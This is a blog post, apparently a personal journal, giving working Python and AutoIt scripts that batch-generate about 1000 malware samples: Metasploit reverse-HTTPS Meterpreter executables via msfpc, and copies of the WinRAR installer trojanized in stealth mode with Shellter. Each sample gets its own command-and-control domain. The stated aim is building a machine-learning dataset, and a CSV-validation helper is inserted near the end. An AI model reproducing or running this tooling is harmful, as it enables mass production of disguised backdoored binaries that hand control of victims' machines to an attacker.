Wednesday, July 25, 2018

Automating generation of Metasploit payloads

This post serves as a journal of the technique used for automating generation of Metasploit payloads. 

Objective: Generation of 1000 Metasploit payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: Previously I used MSFvenom Payload Creator (MSFPC) for quickly generating payloads. MSFPC is a wrapper on top of msfvenom. MSFPC is insufficient to meet my objective, so I had to write a wrapper on top of MSFPC. 

*So this is a wrapper on top of a wrapper. Technically MSFPC is redundant. 

Overview:
1) On a Kali Linux VM
2) Update Metasploit
apt update
apt install metasploit-framework

3) Install MSFPC
apt install -y msfpc

4) Open gedit and copy in the Python script below
import os
import socket
import subprocess

import pandas as pd

# read domain names to use
print("Reading domain names from csv file:")
df = pd.read_csv('./website.csv')
df.info()
print(df.describe())
print("Loaded domain name file")
print("")

correctmsg = "Done"
errmsg = "bignum too big to convert"

# 0-based row index to resume from; lets an interrupted run be continued
startfrom = 2

for index, row in df.iterrows():
    if startfrom > index:
        print("skip: " + str(row.iloc[1]))
        continue

    attempt = 1
    domain = str(row.iloc[0])
    # resolve the domain first; fall back to loopback when it does not resolve
    try:
        addr = socket.gethostbyname(domain)
        print(addr)
        # domain = addr   # uncomment to use the resolved IP address as LHOST instead
    except socket.gaierror:
        print("Domain: " + domain + " is unresolvable, using default IP value instead.")
        domain = "127.0.0.1"

    command = "windows " + domain + " https"
    binaryname = str(row.iloc[1]) + ".exe"
    print(command)

    # retry until msfpc reports "Done"
    x = -1
    while x == -1:
        # split so msfpc receives the same separate arguments a shell would pass
        proc = subprocess.Popen(['msfpc'] + command.split(),
                                stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        # communicate() returns bytes under Python 3; decode before searching
        tmp = proc.communicate()[0].decode(errors="replace")
        x = tmp.find(correctmsg)
        # -1 means errmsg was not found, i.e. the bignum error did not occur
        i = tmp.find(errmsg)

        if x == -1:
            if i != -1:
                print("retrying error crafting payload...: attempting " + str(attempt) + " times")
            else:
                print("error: " + tmp)
            attempt = attempt + 1

    print("Command: msfpc " + command + " is successful.")
    print("Saving as :" + binaryname)
    # msfpc writes a fixed output name; rename it to this row's binary name
    os.replace('./windows-meterpreter-staged-reverse-https-443.exe', './' + binaryname)
    print("Saved")
    print("")


5) Create a csv file (for example in Excel) with a header row followed by one row per payload: first column the domain name, second column the binary name without the .exe extension (the script appends it). Save it as website.csv.

6) Execute the Python script (*internet access is needed, as msfvenom will validate the LHOST domain name)

7) About 40 mins for 100 binaries, 900 to go =)

Metasploit bignum too big to convert into `long' error

Background:
If you are getting the above error, it might be that your Metasploit framework is outdated.
I had this issue when I used the Metasploit framework from a Kali 2017 VM image without updating it.


Solution:
1. Update the framework; the commands below work on my Kali Linux.

apt update
apt install metasploit-framework

Wednesday, July 4, 2018

Automating generation of SHELLTER payloads

This post serves as a journal of the technique used for automating generation of SHELLTER payloads. 

Objective: Generation of 1000 SHELLTER payloads each with a unique C&C domain name and binary name.

Purpose: Creation of malware dataset for Machine Learning

Background: SHELLTER is a closed-source shellcode injection framework that performs dynamic PE infection based on the execution flow of the target application. This approach does not modify the original PE header, which allows the result to appear normal under static analysis. 

SHELLTER is a Windows PE binary and can be found at https://www.shellterproject.com/download/

It can be executed on Linux using WINE or directly on Windows. 

Challenge: I initially ran SHELLTER from Linux but had difficulty automating a WINE terminal. After researching the Python subprocess module, I found it too much of a hassle to redirect input and output between a WINE terminal and a Linux terminal.


Thus I ended up automating SHELLTER from native Windows instead. AutoIt is free software designed for creating automation scripts. 


Overview of Technique:
1) Create a Win7 VM on VMware
2) Download SHELLTER 
3) Download and install AutoIt 
4) Open the AutoIt SciTE script editor
5) Type in the following script


#RequireAdmin

#include <FileConstants.au3>
#include <MsgBoxConstants.au3>
#include <WinAPIFiles.au3>
#include <File.au3>


;If IsAdmin() Then MsgBox($MB_SYSTEMMODAL, "", "The script is running with admin rights.")

Func Generate($vVar1 = "google.com")
    Run('.\shellter.exe')
    Sleep(1000)
    WinWaitActive("Shell7er", "", 1)

    ;automate
    Send("A{Enter}")
    Sleep(1000)

    ;Do not check update
    Send("N{Enter}")
    Sleep(1000)

    ;original binary path
    Send(".\wrar560.exe{Enter}")
    Sleep(35000)

    ;Stealth mode
    Send("Y{Enter}")
    Sleep(1000)

    ;payload selection
    Send("l{Enter}")
    Sleep(2000)
    Send("3{Enter}")
    Sleep(1000)

    ;domain name
    Send($vVar1)
    Send("{Enter}")
    Sleep(1000)

    ;port number
    Send("443{Enter}")
    Sleep(10000)

    Send("{Enter}")
EndFunc


Func print($test3)
    MsgBox($MB_SYSTEMMODAL, "", $test3)
EndFunc

$file = ".\website.csv"
$hFile = FileOpen($file, $FO_READ)
If $hFile = -1 Then
    MsgBox($MB_SYSTEMMODAL, "", "Unable to open " & $file)
    Exit
EndIf

;2 is first entry, 1 is the header
$StartFrom = 2

For $i = $StartFrom To _FileCountLines($file)
    $line = StringSplit(FileReadLine($hFile, $i), ",")
    ;skip blank or malformed lines (fewer than two columns)
    If $line[0] < 2 Then ContinueLoop
    $domainName = $line[1]
    Generate($domainName)
    ;print($line[2])
    Sleep(3000)
    $sDestination = ".\malware\" & $line[2]
    ;MsgBox($MB_SYSTEMMODAL, "", $sDestination)
    ;move the infected copy into the output directory (created if missing),
    ;then restore the clean original from Shellter's backup for the next run
    FileMove(".\wrar560.exe", $sDestination, BitOR($FC_OVERWRITE, $FC_CREATEPATH))
    FileMove(".\Shellter_Backups\wrar560.exe", ".\wrar560.exe", $FC_OVERWRITE)
Next

FileClose($hFile)

6) Save the AutoIt script in the same directory where Shellter.exe resides.
7) Create a csv file (for example in Excel) with a header row followed by one row per payload: first column the domain name, second column the file name to save the infected binary as (the script starts reading at line 2). Save it as website.csv.

8) I have chosen to pack WinRAR (wrar560.exe) with the payload; you may find it here: https://www.rarlab.com/rar/wrar560.exe
9) Save wrar560.exe to the same directory as Shellter.exe
10) Execute the AutoIt script 
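Both procedures on this page (the Python/MSFPC loop and the AutoIt/Shellter loop) read a two-column website.csv with a header row, and the stated objective depends on every domain and binary name being unique, which neither script checks. The following Python check is an added example, not part of the original post or either script: it validates such a file before a run. The RFC 1123 label rule for hostnames is an assumption about what the dataset should accept, and the embedded CSV is constructed sample data.

```python
import csv
import io
import re

# RFC 1123 label rule (an assumption; the post does not define a valid domain)
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")

def is_valid_hostname(name):
    """True for a dotted hostname whose labels all satisfy the label rule."""
    if not name or len(name) > 253 or "." not in name:
        return False
    return all(_LABEL.match(label) for label in name.split("."))

def validate_rows(rows):
    """Check (domain, binary_name) rows from website.csv; return a list of
    (line_number, message). Line 1 is the header, as in both scripts above."""
    problems = []
    seen_domains, seen_names = set(), set()
    for lineno, cols in enumerate(rows, start=2):
        if len(cols) < 2:
            problems.append((lineno, "row needs a domain and a binary name"))
            continue
        domain = cols[0].strip().lower()  # DNS names are case-insensitive
        name = cols[1].strip()
        if not is_valid_hostname(domain):
            problems.append((lineno, "invalid hostname: %r" % cols[0]))
        if not name or "/" in name or "\\" in name:
            problems.append((lineno, "invalid binary name: %r" % cols[1]))
        if domain in seen_domains:
            problems.append((lineno, "duplicate domain: %r" % domain))
        if name in seen_names:
            problems.append((lineno, "duplicate binary name: %r" % name))
        seen_domains.add(domain)
        seen_names.add(name)
    return problems

def validate_csv_text(text):
    """Parse CSV text whose first row is the header and validate the rest."""
    reader = csv.reader(io.StringIO(text))
    next(reader, None)  # skip the header row
    return validate_rows([r for r in reader if any(c.strip() for c in r)])

# constructed sample data, not taken from the original post
SAMPLE_CSV = """domain,binary
example.com,sample001
example.org,sample002
Example.com,sample003
not a host,sample001
"""
```

Run validate_csv_text on the contents of website.csv before starting either loop; an empty result means every row has a well-formed domain and a unique domain and binary name.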


Results: 
Took about 2 days to create over 900 malware samples. 100 more to go =)

Feel free to modify the script accordingly.